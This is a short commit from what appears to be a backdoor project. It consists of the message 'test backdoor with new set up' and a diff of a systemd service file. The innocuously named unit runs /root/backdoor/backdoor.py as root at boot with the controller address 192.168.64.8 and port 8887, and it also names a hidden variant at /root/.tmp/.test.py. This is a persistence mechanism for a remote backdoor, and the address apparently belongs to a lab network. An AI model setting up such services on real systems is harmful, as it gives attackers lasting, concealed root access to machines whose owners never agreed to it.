test backdoor with new set up

--- a/myPythonScript.service
+++ b/myPythonScript.service
@@ -4,8 +4,8 @@ After=network.target
 
 [Service]
 Type=simple
-#ExecStart=/root/backdoor/backdoor.py 192.168.64.8 8888
-ExecStart=/root/.tmp/.test.py 192.168.64.8 8888
+ExecStart=/root/backdoor/backdoor.py 192.168.64.8 8887
+#ExecStart=/root/.tmp/.test.py 192.168.64.8 8887
 User=root
 Group=root
 
